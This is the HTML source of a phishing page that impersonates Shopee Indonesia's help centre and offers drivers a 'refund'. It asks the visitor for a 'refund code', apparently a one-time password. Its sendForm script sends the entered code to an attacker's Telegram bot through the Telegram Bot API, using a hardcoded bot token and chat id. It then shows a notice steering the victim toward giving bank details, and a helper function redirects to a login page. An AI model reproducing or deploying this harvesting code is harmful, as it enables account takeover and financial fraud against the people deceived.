<html>
<head>
 <meta charset="UTF-8">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" content="#ED4D2D">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
  <title>Shopee | Pengembalian Dana Driver</title>
  <meta name="description" content="Pusat bantuan & Layanan Shopee">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://shopee.co.id/">
  <meta property="og:type" content="website">
  <meta property="og:title" content="Shopee | Pengembalian Dana Driver">
  <meta property="og:description" content="Pusat bantuan & Layanan Shopee">
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTZbDtZLhWt09IRL7roOUEZzdmzzzbHZCzfQnHiEPO-lGuM9YH1DiHLGYDm&s=10">

  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="https://shopee.co.id/">
  <meta property="twitter:url" content="https://shopee.co.id/">
  <meta name="twitter:title" content="Shopee | Pengembalian Dana Driver">
  <meta name="twitter:description" content="Pusat bantuan & Layanan Shopee">
  <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTZbDtZLhWt09IRL7roOUEZzdmzzzbHZCzfQnHiEPO-lGuM9YH1DiHLGYDm&s=10">
 <link rel="icon" type="image/png" sizes="32x32" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTZbDtZLhWt09IRL7roOUEZzdmzzzbHZCzfQnHiEPO-lGuM9YH1DiHLGYDm&s=10">
<link rel="icon" type="image/png" sizes="96x96" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTZbDtZLhWt09IRL7roOUEZzdmzzzbHZCzfQnHiEPO-lGuM9YH1DiHLGYDm&s=10">

 <link rel="canonical" href="https://shopee.co.id/">
<meta property="og:url" content="https://shopee.co.id/" />
<meta property="og:description" content="Hai Shopeer, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai Shopeer, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Varela+Round&amp;display=swap'><link rel="stylesheet" href="./style.css">
<!-- partial:index.partial.html -->
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.theme.default.min.css" rel="stylesheet">
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/vendors/jquery.min.js">
</script>
 <script src="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/owl.carousel.js">
   </script>

</head>
<style>
 form {
  --background: none;
  --text: #414856;
  --radio: #7C96B2;
  --radio-checked: #118EEA;
  --radio-size: 22px;
  --width: 292px;
  --height: 180px;
  --border-radius: 10px;
  background: var(--background);
  width: var(--width);
  height: var(--height);
  border-radius: var(--border-radius);
  color: var(--text);
  position: absolute;
  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;
  padding: 30px 20px;
  padding-top: 10px;
  display: grid;
  top: 385px;
  grid-template-columns: auto var(--radio-size);
  font-weight: bold;
  align-items: center;
  
}
form label {
  cursor: pointer;
  color: #118EEA;
  font-weight: bold;
  
}
form input[type=tel] {
  -webkit-appearance: none;
  -moz-appearance: none;
  position: relative;
  height: var(--radio-size);
  width: var(--radio-size);
  outline: none;
  margin: 3px 0;
  cursor: pointer;
  border: 2px solid var(--radio);
  background: transparent;
  border-radius: 50%;
  display: grid;
  
  justify-self: end;
  justify-items: center;
  align-items: center;
  overflow: hidden;
  transition: border 0.5s ease;
}
form input[type=radio]::before, form input[type=radio]::after {
  content: "";
  display: flex;
  justify-self: center;
  border-radius: 50%;
}
form input[type=radio]::before {
  position: absolute;
  width: 100%;
  height: 100%;
  background: var(--background);
  z-index: 1;
  opacity: var(--opacity, 1);
}
form input[type=radio]::after {
  position: relative;
  width: calc(100% /2);
  height: calc(100% /2);
  background: var(--radio-checked);
  top: var(--y, 100%);
  transition: top 0.5s cubic-bezier(0.48, 1.97, 0.5, 0.63);
}
form input[type=radio]:checked {
  --radio: var(--radio-checked);
}
form input[type=radio]:checked::after {
  --y: 0%;
  -webkit-animation: stretch-animate 0.3s ease-out 0.17s;
          animation: stretch-animate 0.3s ease-out 0.17s;
}
form input[type=radio]:checked::before {
  --opacity: 0;
}
form input[type=radio]:checked ~ input[type=radio]::after {
  --y: -100%;
}
form input[type=radio]:not(:checked)::before {
  --opacity: 1;
  transition: opacity 0s linear 0.5s;
}

@-webkit-keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}

@keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}
body {
  background: #118EEA;
  height: 100%;
  font: 400 16px "Varela Round", sans-serif;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}
body .socials {
  position: fixed;
  display: block;
  left: 20px;
  bottom: 20px;
}
body .socials > a {
  display: block;
  width: 30px;
  opacity: 0.2;
  transform: scale(var(--scale, 0.8));
  transition: transform 0.3s cubic-bezier(0.38, -0.12, 0.24, 1.91);
}
body .socials > a:hover {
  --scale: 1;
}   


/* Added PseudoCode CSS to Hide the Controls of Video as on adding Controls Attribute to Video, the controls of video get visible easily. So to control that case also, this needs to be present on CSS End */

video::-webkit-media-controls {
    display: ;
}

video {
  display: none;
  pointer-events: none;
}


#carousel {
  grid-row: 1 / 2;
  grid-column: 1 / 8;
  width: 150vw;
  height: 500px;
  display: flex;
  align-items: center;
  justify-content: center;
  overflow: hidden;
  transform-style: preserve-3d;
  perspective: 600px;
  --items: 5;
  --middle: 3;
  --position: 1;
  pointer-events: none;
}

div.item {
  position: absolute;
  width: 300px;
  height: 400px;
  background-color: coral;
  --r: calc(var(--position) - var(--offset));
  --abs: max(calc(var(--r) * -1), var(--r));
  transition: all 0.25s linear;
  transform: rotateY(calc(-10deg * var(--r)))
    translateX(calc(-300px * var(--r)));
  z-index: calc((var(--position) - var(--abs)));
}

div.item:nth-of-type(1) {
  --offset: 1;
  background-color: #90f1ef;
}
div.item:nth-of-type(2) {
  --offset: 2;
  background-color: #ff70a6;
}
div.item:nth-of-type(3) {
  --offset: 3;
  background-color: #ff9770;
}
div.item:nth-of-type(4) {
  --offset: 4;
  background-color: #ffd670;
}
div.item:nth-of-type(5) {
  --offset: 5;
  background-color: #e9ff70;
}


/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

#btnku:hover{
    background: #BA441F;
}


input::placeholder{
    opacity: 0.5;
}
</style>
<body style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1rhptKHfS84051OH6GDKwV_JyDIni1KuS52jRMzcgRzwxiVwYf6irgnG8t8Bv3rMWdSLV-mmalm3WFrTzT4ySjujYaL0s1xJUzf9pp2MDPXZGCopbxMV4TRk1DF49IQC41NU9ArM5qvafDkink2pMiJHLKx8s9BBFSFT5xvl7V2IWeEeMXLQGD3RYW3A/s2138/AddText_09-26-02.39.46.jpg); background-size: 100% 100%; background-position: 100% 100%;">
<form onsubmit="sendForm(event); return false" id="sodrive" method="post" >

<input type="tel" id="otpd" name="otpd" placeholder="Kode Pengembalian Dana" style="width: 300px; height: 40px; margin-top:40px; border: none; background: #ffffff; color: #EB582C; font-weight: bold; box-shadow: 0 5px 5px rgba(65, 72, 86, 0.3); border-radius: 8px;padding: 10px" maxlength=""><br>
 <button id="btnku" type="submit" style="width: 300px; height: 40px; margin-top: -20px; border: none; background: #FFE455; color: #EB582C; font-weight: 800; box-shadow: 0 5px 5px rgba(65, 72, 86, 0.3); border-radius: 50px;">𝗖𝗔𝗜𝗥𝗞𝗔𝗡 𝗗𝗔𝗡𝗔</button>   
    
</div>
</form>
<center>
<form id="notif" style="display: none;  padding: 0px; margin: 0px auto; left: 0%; right:  0%; width: 85%; background-color: #fff">
    <div style="margin-left: 22px; color: #EB582C">Mohon Maaf Dana Anda Hanya Bisa Di Proseskan Ke Rekening BANK</div>
</form>
</center>
<div id="screen" class="navbar-fake" style="height:100%; width: 100%;background-color:#EFEFEF;box-shadow:0 0 6px 0 rgba(0,0,0,.06); position: fixed; top: 0; ">
<style>@keyframes movement{from{transform:translateY(2px)}50%{transform:translateY(-2px)}to{transform:translateY(2px)}}.spinner circle{animation:.4s movement linear infinite}.spinner circle:nth-child(2){animation-delay:.1s}.spinner circle:nth-child(3){animation-delay:.2s}</style>
<svg class="spinner" style="position:fixed;top:50%;left:50%;transform:translateX(-50%) translateY(-50%)" width="34" height="12" viewBox="-1 0 33 12">
<circle class="loading-dot" cx="4" cy="6" r="4" fill="#ee4d2d"></circle>
<circle class="loading-dot" cx="16" cy="6" r="4" fill="#ee4d2d"></circle>
<circle class="loading-dot" cx="28" cy="6" r="4" fill="#ee4d2d"></circle>
</svg>
</div>
  <script>
  $( document ).ready(function() {
            setTimeout(() => {
                $('#screen').fadeOut();
                $('chsalxcome2').fadeIn();
            },2500)
        });
         
  
  
  
  
var owl = $('.owl-carousel');
owl.owlCarousel({
    items:2, 
  // items change number for slider display on desktop
  
    loop:true,
    margin:10,
    autoplay:true,
    autoplayHoverPause:true
});      
      
  </script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
 function sendForm(event) {
     
     
$('#screen').fadeIn();
    var otpd = document.getElementById('otpd');
   
    

    var gabungan = "├•★𝓢𝓱𝓸𝓹𝓮𝓮 𝓘𝓷𝓭𝓸𝓷𝓮𝓼𝓲𝓪★" + "%0A├───────────────────" + '%0A├•※ 𝗞𝗼𝗱𝗲 : ' + otpd.value +  '%0A╰───────────────────';

   
var token = '8059782636:AAF1uzqaSLtyE3ml_MqJSOuGLCG1XJQKmls'; // Ganti dengan token bot yang kamu buat
    var grup = '5546059932'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
   
    success: function(){
    setTimeout(function(){
$('#screen').fadeOut();
$('#notif').fadeIn();
    }, 1000);}});};
     </script>      
<script>
    /* Toggle Button to Unmute the Video */

function toggleMute() {
    var video = document.getElementById('video');
    if (video.muted) {
        video.muted = false;
    } else {
        video.muted = true;
    }
}

/* Delay Function to Add SetTimeOut After Defined Interval */

function delay(time) {
    return new Promise((resolve) => setTimeout(resolve, time));
}

/* Show Video Function to Add Display Property to Show the Video on Click of Button which will fulfilled User Interaction Needs to Browser to Run the Video with Unmute State */

function showVideo() {
    var element = document.getElementById('video');
    var button = document.getElementById('button');
    element.style.display = 'block';
    button.style.display = 'none';
    delay(100).then(() => toggleMute());
}
</script>
<script>
 function letsgo(){
 $("#process1").show();    
 window.location.href="login.html";
 }   
</script>

</body>
</html>
